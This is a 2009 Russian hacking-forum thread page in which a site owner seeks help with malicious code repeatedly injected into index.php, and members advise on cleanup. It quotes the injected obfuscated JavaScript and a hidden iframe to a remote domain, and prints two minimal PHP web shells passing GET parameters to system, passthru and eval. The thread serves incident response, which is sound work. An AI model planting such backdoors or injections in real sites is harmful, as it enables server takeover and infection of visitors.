ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Вредоносный код на сайте!!!
   
Ответ
Страница 3 из 4 < 1 2 3 4 >
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 17.06.2009, 12:25
Аватар для POS_troi
POS_troi
Познавший АНТИЧАТ
Регистрация: 01.12.2006
Сообщений: 1,769
Провел на форуме:
3718311

Репутация: 1118


Отправить сообщение для POS_troi с помощью ICQ
По умолчанию
Цитата:
такие хитроумные админы на gov-ах часто попадаются
К сожалению на gov не работал =)

Цитата:
Блин, сегодня захожу, там уже другая ***ня:
Пасс на ФТП поменял?

если не боишся то можеш кинуть в личку ссылку на архив с копией файлов двига. бум искать шелл.
Последний раз редактировалось POS_troi; 17.06.2009 в 12:28..
 
Ответить с цитированием

  #22  
Старый 17.06.2009, 13:28
Аватар для Dobby007
Dobby007
Познающий
Регистрация: 07.09.2008
Сообщений: 55
Провел на форуме:
163517

Репутация: 57
Отправить сообщение для Dobby007 с помощью ICQ
По умолчанию
Цитата:
Сообщение от mff  
Блин, сегодня захожу, там уже другая ***ня:
Помогите, хелп, приклеевается в конец документа index.php Что делать? Вири на компе подавил
Все, все да не все
Твой код соответствует этому:
Код:
<script language="javascript">
function dosometing( subvalue ){
var s1 = "Uynwt85eFPV1QOfELcWBRJG+gxZMh6Xvr7kb3d4/pKu9iNAqoTs2az0mSDCHIjlY";
var s2 = '';
var s3 = 18;
var s4 = 0;
for ( var i = 0; i < subvalue.length; i++ ) { 
var s5 = s1.indexOf( subvalue.charAt( i ) ); 
if ( s3 == 0 ) { 
s4 = s4 | s5; 
var s6 = ( s4 & 0xFF0000 ) >> 16;
if ( s6 != 0 ) {
s2 += String.fromCharCode( s6 );
}
var s7 = ( s4 & 0xFF00 ) >> 8;
if ( s7 != 0 ){
s2 += String.fromCharCode( s7 );
}
var s8 = s4 & 0xFF;
if ( s8 != 0 ){
s2 += String.fromCharCode( s8 );
}
s4 = 0;
s3    = 18;
} else {
s5 = s5 << s3;
s4 = s4 | s5;
s3 -= 6;
}
}
return s2;
} 
alert( dosometing( 'E5d4h48NxWy2h4QjF47a6eUC1sjah/JkgBRAg0SqZGD3x+rAh57oFkymZGcaZwaTF57dZG6p6waTFeOa  XGTdEWP0Z+OKg4diZ+cDfkypZGc3xGSkEboqZGxsgGzdErUU' ) );
</script>
Что собственно сильно на результат не влияет
Цитата:
<iframe src="http://truba5.cn/index.php" width=1 height=1 sty???SO'f?6?&???G????FFVa#aAo?g&OSa
Хотя немного странно...

Цитата:
если не боишся то можеш кинуть в личку ссылку на архив с копией файлов двига. бум искать шелл.
ИМХО это все-таки троян (ну всмысле автоматом делается). Просто внимательно надо посмотреть принцип работы...
А че шелл?.. Если это и шелл (хотя маловероятно), то шелл ТС и сам может найти...
Весь PHP-код на сайте посмотри. Там что-то "инородное" сразу, в принципе, невооруженным глазом видно
 
Ответить с цитированием

  #23  
Старый 17.06.2009, 16:01
Аватар для mff
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479

Репутация: 1809


Отправить сообщение для mff с помощью ICQ
По умолчанию
Спасибо, полез искать заразу
 
Ответить с цитированием

  #24  
Старый 17.06.2009, 17:52
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию
сервер на никсах?
смотри тщательно процессы. Все эти дела может запускать простенький скрипт, фопеном грузить откуда-то то, что надо и все..раз в час или в другой промежуток времени. вобще выставь r-r-r на индекс.пхп, а еще лучше човни индекс другим юзером)) и права на запись потом уже убери.корень не забудь тоже.
Последний раз редактировалось $n@ke; 17.06.2009 в 17:54..
 
Ответить с цитированием

  #25  
Старый 17.06.2009, 19:07
Аватар для mff
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479

Репутация: 1809


Отправить сообщение для mff с помощью ICQ
По умолчанию
$n@ke, спасибо, поменяю права сейчас!

Нашел гниду! В папке инклудес валялась, посмотрите, что за дрянь:

news127.inc больше метра весит
Последний раз редактировалось mff; 17.06.2009 в 19:35..
 
Ответить с цитированием

  #26  
Старый 17.06.2009, 20:32
Аватар для Dobby007
Dobby007
Познающий
Регистрация: 07.09.2008
Сообщений: 55
Провел на форуме:
163517

Репутация: 57
Отправить сообщение для Dobby007 с помощью ICQ
По умолчанию
Цитата:
Сообщение от mff  
$n@ke, спасибо, поменяю права сейчас!
Нашел гниду! В папке инклудес валялась, посмотрите, что за дрянь:
news127.inc
Это не шелл. Это прайс-лист, который ты можешь открыть и посмотреть, допустим, Word'ом 2007
Кстати он там и делался...
Шелл это, допустим, вот так:
Код:
<?php 
if(isset($_GET['cmd']){
system($_GET['cmd']);
passthru($_GET['cmd']);
}
?>
При чем данный код, может находиться хоть в середине, хоть в конце, хоть в начале документа. Ну это самый, что ни на есть простой тип. Более сложный это.... ну допустим... r57shell (взял его так как он и самый распространенный)...

Цитата:
Сообщение от mff  
больше метра весит
На 3 кб меньше
 
Ответить с цитированием

  #27  
Старый 17.06.2009, 20:53
Аватар для big_BRAT
big_BRAT
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655

Репутация: 168
Отправить сообщение для big_BRAT с помощью ICQ
По умолчанию
а ты точно уверен в хостинге? те сайты которые крутятся на этом же хостинге не страдают той же заразой? в саппорт не обращался?

проверь по дате, может найдеш файлик который ты не менял, поищи по содержанию eval, system (хотя он может удаленно инклудиться), просмотри лог апача... а так $n@ke написал все правильно
 
Ответить с цитированием

  #28  
Старый 17.06.2009, 21:09
Аватар для geforse
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841

Репутация: 712


Отправить сообщение для geforse с помощью ICQ
По умолчанию
Цитата:
Сообщение от POS_troi  
Я на всех ресурсах использовал скриптик который проверял (по заданию в "кроне" ) Суммы всех файлов и в случае чего отписывал на мыло и заменял файл на оригинальный, но все это было на VDS.
Так этот "скриптик" можно изменить:

<?php echo "Всё зае*ись! Шелов не обнаружено"; ?>

Поэтому удалять его нужно с сервера до следующей проверки
 
Ответить с цитированием

  #29  
Старый 17.06.2009, 21:13
Аватар для mff
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479

Репутация: 1809


Отправить сообщение для mff с помощью ICQ
По умолчанию
Цитата:
Сообщение от big_BRAT  
а ты точно уверен в хостинге? те сайты которые крутятся на этом же хостинге не страдают той же заразой? в саппорт не обращался?

проверь по дате, может найдеш файлик который ты не менял, поищи по содержанию eval, system (хотя он может удаленно инклудиться), просмотри лог апача... а так $n@ke написал все правильно
Хостинг sweb.ru
Обращаться нет смысла, как всегда скажут смотрите свой комп. Др сайты на этом хосте норм!
 
Ответить с цитированием

  #30  
Старый 17.06.2009, 23:11
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию
Цитата:
Сообщение от Tigger  
Проверяй каждый файл на наличие вредоносного кода.
PHP код:
<?PHP
eval($_GET['c']);
?>
Врятдле это антивирус запалит
 
Ответить с цитированием
Ответ
Страница 3 из 4 < 1 2 3 4 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Хакеры научились помещать вредоносный код в BIOS FraiDex Мировые новости 3 30.03.2009 12:16
Ошибки Windows dinar_007 Windows 19 01.07.2007 13:32
Коды состояния HTTP - Коды ошибок http сервера D=P=CH= MOD= *nix 6 15.10.2006 20:47
Вредоносный код может быть записан в Bios при помощи Acpi dinar_007 Мировые новости 0 30.01.2006 16:52



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ